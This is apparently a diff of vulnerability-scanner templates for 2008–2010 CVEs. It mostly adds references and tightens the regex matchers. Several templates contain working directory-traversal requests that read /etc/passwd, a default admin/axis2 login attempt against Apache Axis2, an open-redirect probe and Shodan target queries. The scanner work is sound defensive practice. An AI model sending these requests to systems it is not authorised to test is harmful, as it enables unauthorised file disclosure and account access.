||||
- http://secunia.com/advisories/30333
|
||||
- http://securityreason.com/securityalert/3896
|
||||
classification:
|
||||
cve-id: CVE-2008-2398
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,12 +1,20 @@
|
|||
id: CVE-2008-2650
|
||||
|
||||
info:
|
||||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference: https://www.exploit-db.com/exploits/5700
|
||||
reference:
|
||||
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
|
||||
- http://www.securityfocus.com/bid/29450
|
||||
- http://secunia.com/advisories/30463
|
||||
- http://osvdb.org/45881
|
||||
classification:
|
||||
cve-id: CVE-2008-2650
|
||||
tags: cve,cve2008,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4668
|
||||
- http://www.securityfocus.com/bid/31458
|
||||
- http://securityreason.com/securityalert/4464
|
||||
classification:
|
||||
cve-id: CVE-2008-4668
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- https://www.cvedetails.com/cve/CVE-2008-4764
|
||||
- http://www.securityfocus.com/bid/28764
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
|
||||
classification:
|
||||
cve-id: CVE-2008-4764
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -4,11 +4,17 @@ info:
|
|||
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
reference: https://www.exploit-db.com/exploits/7363
|
||||
tags: cve2008,lfi,phppgadmin
|
||||
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/7363
|
||||
- http://www.securityfocus.com/bid/32670
|
||||
- http://secunia.com/advisories/33014
|
||||
- http://secunia.com/advisories/33263
|
||||
classification:
|
||||
cve-id: CVE-2008-5587
|
||||
metadata:
|
||||
shodan-query: 'http.title:"phpPgAdmin"'
|
||||
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve2008,lfi,phppgadmin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
- http://secunia.com/advisories/32377
|
||||
- http://www.securityfocus.com/bid/31877
|
||||
classification:
|
||||
cve-id: CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -4,10 +4,14 @@ info:
|
|||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6172
|
||||
- http://secunia.com/advisories/32367
|
||||
- http://www.securityfocus.com/bid/31892
|
||||
classification:
|
||||
cve-id: CVE-2008-6172
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,8 +24,10 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
- http://secunia.com/advisories/32523
|
||||
- http://www.securityfocus.com/bid/32113
|
||||
classification:
|
||||
cve-id: CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -2,13 +2,17 @@ id: CVE-2008-6668
|
|||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008
|
||||
- http://www.securityfocus.com/bid/29804
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
|
||||
classification:
|
||||
cve-id: CVE-2008-6668
|
||||
tags: nweb2fax,lfi,cve,cve2008,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -3,9 +3,15 @@ id: CVE-2009-0545
|
|||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8023
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
|
||||
- http://www.zeroshell.net/eng/announcements/
|
||||
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
|
||||
classification:
|
||||
cve-id: CVE-2009-0545
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
|
@ -18,3 +24,5 @@ requests:
|
|||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/04/18
|
||||
|
|
|
@ -4,12 +4,15 @@ info:
|
|||
name: Horde - Horde_Image::factory driver Argument LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
tags: cve,cve2009,horde,lfi
|
||||
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
|
||||
- http://secunia.com/advisories/33695
|
||||
classification:
|
||||
cve-id: CVE-2009-0932
|
||||
tags: cve,cve2009,horde,lfi,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -21,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
|
||||
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
|
||||
classification:
|
||||
cve-id: CVE-2009-1151
|
||||
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
||||
|
||||
requests:
|
||||
|
|
|
@ -8,6 +8,9 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
- http://www.securityfocus.com/bid/34431
|
||||
classification:
|
||||
cve-id: CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +23,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -5,8 +5,14 @@ info:
|
|||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/32954
|
||||
- http://www.securityfocus.com/bid/34713
|
||||
- http://www.vupen.com/english/advisories/2009/1173
|
||||
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
|
||||
classification:
|
||||
cve-id: CVE-2009-1558
|
||||
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,7 +23,7 @@ requests:
|
|||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,13 @@ info:
|
|||
reference:
|
||||
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
|
||||
- http://www.dsecrg.com/pages/vul/show.php?id=122
|
||||
classification:
|
||||
cve-id: CVE-2009-1872
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
verified: "true"
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
- http://www.securityfocus.com/bid/35259
|
||||
- http://www.vupen.com/english/advisories/2009/1530
|
||||
classification:
|
||||
cve-id: CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
- http://www.securityfocus.com/bid/35378
|
||||
- http://osvdb.org/55176
|
||||
classification:
|
||||
cve-id: CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,10 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
- http://www.securityfocus.com/bid/36207
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
||||
classification:
|
||||
cve-id: CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,6 +8,9 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
- http://www.securityfocus.com/bid/36441
|
||||
classification:
|
||||
cve-id: CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
|
@ -20,7 +23,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -8,7 +8,11 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
- http://www.vupen.com/english/advisories/2009/1494
|
||||
- http://www.securityfocus.com/bid/35201
|
||||
classification:
|
||||
cve-id: CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi,photo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -2,12 +2,16 @@ id: CVE-2009-4223
|
|||
|
||||
info:
|
||||
name: KR-Web <= 1.1b2 RFI
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
author: geeknik
|
||||
severity: high
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
|
||||
- http://www.exploit-db.com/exploits/10216
|
||||
classification:
|
||||
cve-id: CVE-2009-4223
|
||||
tags: cve,cve2009,krweb,rfi
|
||||
|
||||
requests:
|
||||
|
|
|
@ -5,10 +5,14 @@ info:
|
|||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
- http://secunia.com/advisories/37760
|
||||
- http://www.osvdb.org/61382
|
||||
classification:
|
||||
cve-id: CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi,nexus
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -20,7 +24,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2009-5020
|
||||
|
||||
info:
|
||||
name: AWStats < 6.95 - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
|
||||
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,awstats
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
- http://websecurity.com.ua/2628/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
- http://secunia.com/advisories/37896
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
id: CVE-2010-0219
|
||||
|
||||
info:
|
||||
name: Apache Axis2 Default Login
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
|
||||
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
|
||||
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
|
||||
- http://www.vupen.com/english/advisories/2010/2673
|
||||
classification:
|
||||
cve-id: CVE-2010-0219
|
||||
metadata:
|
||||
shodan-query: http.html:"Apache Axis"
|
||||
tags: cve,cve2010,axis,apache,default-login,axis2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginUsername={{username}}&loginPassword={{password}}
|
||||
|
||||
- |
|
||||
POST /axis2/axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
userName={{username}}&password={{password}}&submit=+Login+
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- axis2
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
|
@ -4,29 +4,30 @@ info:
|
|||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://www.securityfocus.com/bid/37987
|
||||
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cvss-score: 5.8
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -1,27 +1,31 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
- http://secunia.com/advisories/38587
|
||||
- http://www.joomlaworks.gr/content/view/77/34/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
- http://secunia.com/advisories/38637
|
||||
- http://www.securityfocus.com/bid/38296
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cve-id: CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -8,20 +8,22 @@ info:
|
|||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cve-id: CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
||||
|
|
|
@ -4,24 +4,27 @@ info:
|
|||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
